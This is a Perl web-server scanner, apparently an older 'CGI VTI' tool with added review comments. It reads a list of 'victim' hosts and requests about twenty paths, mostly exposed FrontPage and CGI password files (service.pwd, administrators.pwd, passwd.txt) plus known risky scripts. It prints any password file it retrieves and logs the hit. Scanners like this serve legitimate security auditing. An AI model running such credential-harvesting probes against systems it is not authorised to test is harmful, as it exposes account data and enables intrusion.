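This scanner probes web servers for exposed Common Gateway Interface (CGI) scripts and Vermeer Technology Incorporated (VTI) service files. A hit means only that the path returned an HTTP success status; it does not by itself confirm a vulnerability.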
3178e91d7d1afb673055f6147eac68be504e83bb41b722d15eb3a98d6d9a3647
##########################################################################
# This scanner searches for vulnerable Common Gateway Interface and      #
# Vermeer Technology Incorporated services that may lead to root-level   #
# security compromise. About 25% ripped from iisscan by Piffy.           #
##########################################################################
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
# Last answer typed at the Y/N confirmation prompt.
my $userresp;
# Target hosts, filled from the user-supplied list file (one per line).
my @victim;
# Single HTTP client shared by every probe request in this script.
my $def = LWP::UserAgent->new;
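# Banner; the heredoc text is printed verbatim.
print<<__MENU;
NeoErudition Technologies
CGI VTI service scanner
By: Lawrence
http://neoerudition.net
__MENU
print qq(\n\n\nEnter Y or N to continue. [Y/N]: );

# Confirmation gate: no request is sent to any host until the operator
# answers yes. Only the exact spellings listed here are accepted.
my %is_yes = map { $_ => 1 } qw(Y y yes);
my %is_no  = map { $_ => 1 } qw(N n no);
while (1) {
    $userresp = <STDIN>;

    # End of input (closed pipe, Ctrl-D) yields undef, which matches no
    # answer; without this guard the loop would re-prompt forever.
    if (!defined $userresp) {
        print "\nNo answer received; exiting.\n";
        exit;
    }
    chomp $userresp;

    if ($is_yes{$userresp}) {
        print "Proceeding...\n";
        last;
    }
    elsif ($is_no{$userresp}) {
        print "Exiting as requested.\n";
        exit;
    }
    else {
        print "Thats not a valid answer. [Y/N]: ";
    }
}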
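# Load the target list. Every non-empty line of the file becomes one entry
# of @victim and is later interpolated as the host part of http://HOST/path,
# so the file alone decides which systems receive requests.
print qq(\nWhat file contains the victim address: );
my $victim = <STDIN>;
$victim = '' unless defined $victim;    # end of input: fall through to the open error
chomp $victim;

# Three-argument open on a lexical handle: the text typed at the prompt is
# used strictly as the name of a file to read. The two-argument form lets
# leading or trailing mode characters in the name change what open() does.
open(my $list_fh, '<', $victim) or die "\nCould not open $victim: $!";
while (my $line = <$list_fh>) {
    chomp $line;
    next if $line eq '';    # a blank line would produce the malformed URL http:///...
    push @victim, $line;
}
close($list_fh);

# $a is the index of the host being scanned and $b the number of hosts;
# the scan loop and the check subs below read both package variables.
$a = 0;
$b = scalar @victim;
print qq(CGI/VTI Scan Initiated..\n);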
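# Scan loop: one pass per host in @victim. This block runs the first check
# (/_vti_pvt/service.grp) and then starts the chain second() .. twentieeth().
# twentieeth() is the only place $a is advanced, so the loop moves to the
# next host only after the whole chain has run.
# NOTE(review): /_vti_pvt/ is presumably the FrontPage (VTI) private
# directory; on the server side the remedy is to deny web access to it.
while ($a < $b) {
    my $path = '/_vti_pvt/service.grp';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx status counts, so a server that answers unknown paths
        # with a 200 error page is recorded as a hit; verify by hand.
        # The body is untrusted data and is echoed to the terminal as-is.
        print $response->content;

        # Three-argument open on a lexical handle, with failures reported:
        # a finding that cannot be written must not be lost silently.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors, so this message does not
        # prove the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    second();
}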
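# Requests /_vti_pvt/authors.pwd from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with third().
# NOTE(review): a readable .pwd file under /_vti_pvt/ presumably exposes
# account data; the server-side remedy is to deny web access to that directory.
sub second() {
    my $path = '/_vti_pvt/authors.pwd';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    third();
}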
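# Requests /cgi-bin/password.txt from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with fourth().
# NOTE(review): the file name suggests stored credentials; such files
# belong outside any directory the web server can serve.
sub third() {
    my $path = '/cgi-bin/password.txt';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    fourth();
}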
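# Requests /_vti_pvt/service.pwd from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with fifth().
# NOTE(review): a readable .pwd file under /_vti_pvt/ presumably exposes
# account data; the server-side remedy is to deny web access to that directory.
sub fourth() {
    my $path = '/_vti_pvt/service.pwd';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    fifth();
}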
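# Requests /_vti_pvt/users.pwd from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with sixth().
# NOTE(review): a readable .pwd file under /_vti_pvt/ presumably exposes
# account data; the server-side remedy is to deny web access to that directory.
sub fifth() {
    my $path = '/_vti_pvt/users.pwd';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    sixth();
}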
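# Requests /_vti_pvt/administrator.pwd from the current host ($victim[$a]).
# On an HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with seventh().
# NOTE(review): a readable .pwd file under /_vti_pvt/ presumably exposes
# account data; the server-side remedy is to deny web access to that directory.
sub sixth() {
    my $path = '/_vti_pvt/administrator.pwd';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    seventh();
}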
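# Requests /_vti_pvt/administrators.pwd from the current host ($victim[$a]).
# On an HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with eigth().
# NOTE(review): a readable .pwd file under /_vti_pvt/ presumably exposes
# account data; the server-side remedy is to deny web access to that directory.
sub seventh() {
    my $path = '/_vti_pvt/administrators.pwd';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    eigth();
}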
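# Requests /cgi-win/uploader.exe from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with nineth().
# NOTE(review): a hit shows only that an upload handler answers at this
# path; whether uploads are authenticated or restricted is not tested here.
sub eigth() {
    my $path = '/cgi-win/uploader.exe';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    nineth();
}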
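# Requests /cgi-bin/upload.pl from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with tenth().
# NOTE(review): a hit shows only that an upload handler answers at this
# path; whether uploads are authenticated or restricted is not tested here.
sub nineth() {
    my $path = '/cgi-bin/upload.pl';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    tenth();
}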
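# Requests /cgi-bin/whois_raw.cgi? from the current host ($victim[$a]). On
# an HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with eleventh().
# NOTE(review): a hit shows only that the script exists; the installed
# version has to be checked separately to know whether it is affected.
sub tenth() {
    my $path = '/cgi-bin/whois_raw.cgi?';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    eleventh();
}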
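# Requests /cgi-bin/passwd from the current host ($victim[$a]). On an HTTP
# success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with twelth().
# NOTE(review): the file name suggests stored credentials; such files
# belong outside any directory the web server can serve.
sub eleventh() {
    my $path = '/cgi-bin/passwd';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    twelth();
}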
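# Requests /cgi-bin/passwd.txt from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with thirteenth().
# NOTE(review): the file name suggests stored credentials; such files
# belong outside any directory the web server can serve.
sub twelth() {
    my $path = '/cgi-bin/passwd.txt';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    thirteenth();
}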
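# Requests /cgi-bin/password from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with fourteenth().
# NOTE(review): the file name suggests stored credentials; such files
# belong outside any directory the web server can serve.
sub thirteenth() {
    my $path = '/cgi-bin/password';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    fourteenth();
}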
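# Requests /cgi-bin/password.txt from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with fifteenth().
# NOTE(review): this is the same path third() already requests, so each
# host receives the request twice and a hit is logged twice; kept as-is
# to preserve the script's output.
sub fourteenth() {
    my $path = '/cgi-bin/password.txt';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    fifteenth();
}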
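# Requests /cgi-bin/handler.cgi from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with sixteenth().
# NOTE(review): a hit shows only that the script exists; the installed
# version has to be checked separately to know whether it is affected.
sub fifteenth() {
    my $path = '/cgi-bin/handler.cgi';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    sixteenth();
}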
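# Requests /cgi-bin/handler from the current host ($victim[$a]). On an HTTP
# success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with seventeenth().
# NOTE(review): a hit shows only that the script exists; the installed
# version has to be checked separately to know whether it is affected.
sub sixteenth() {
    my $path = '/cgi-bin/handler';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    seventeenth();
}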
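# Requests /cgi-bin/files.pl from the current host ($victim[$a]). On an
# HTTP success status the body is echoed and host+path is appended to
# cgivti.log; in either case the chain continues with eigtheenth().
# NOTE(review): a hit shows only that the script exists; the installed
# version has to be checked separately to know whether it is affected.
sub seventeenth() {
    my $path = '/cgi-bin/files.pl';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    eigtheenth();
}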
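# Requests /msadc/Samples/SELECTOR/showcode.asp from the current host
# ($victim[$a]). On an HTTP success status the body is echoed and host+path
# is appended to cgivti.log; the chain then continues with nineteenth().
# NOTE(review): the path points at sample content; the server-side remedy
# is to remove sample scripts from production web roots.
sub eigtheenth() {
    my $path = '/msadc/Samples/SELECTOR/showcode.asp';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    nineteenth();
}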
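# Requests /msadc/Samples/selector/showcode.asp from the current host
# ($victim[$a]). On an HTTP success status the body is echoed and host+path
# is appended to cgivti.log; the chain then continues with twentieeth().
# NOTE(review): differs from the path in eigtheenth() only in the case of
# "selector"; on a server with case-insensitive paths both requests reach
# the same file and a hit is logged under both spellings.
sub nineteenth() {
    my $path = '/msadc/Samples/selector/showcode.asp';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }
    twentieeth();
}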
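# Last check of the chain: requests /session/adminlogin? from the current
# host ($victim[$a]). On an HTTP success status the body is echoed and
# host+path is appended to cgivti.log. Finally advances $a so the scan
# loop moves on to the next host.
# NOTE(review): a login page that answers with a success status is not a
# finding by itself; it only shows the admin interface is reachable.
sub twentieeth() {
    my $path = '/session/adminlogin?';
    print qq(:: Checking for $path\n);
    my $response = $def->request(HTTP::Request->new('GET', "http://$victim[$a]$path"));
    if ($response->is_success) {
        # Any 2xx counts, including a custom 200 error page; the body is
        # untrusted and is echoed to the terminal as-is.
        print $response->content;

        # Checked three-argument open so a failed log write is reported
        # instead of silently dropping the finding.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]$path";
            close($log) or warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        # Also reached on connection errors; not proof the path is absent.
        print qq(Not Vulnerable..\n\n);
    }

    # Host index for the scan loop; this is the only increment per host.
    $a++;
}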
# Reads one line with the <> operator (STDIN when no command-line arguments
# were given) and discards it; presumably a pause so the output stays
# visible before the script exits -- TODO confirm.
<>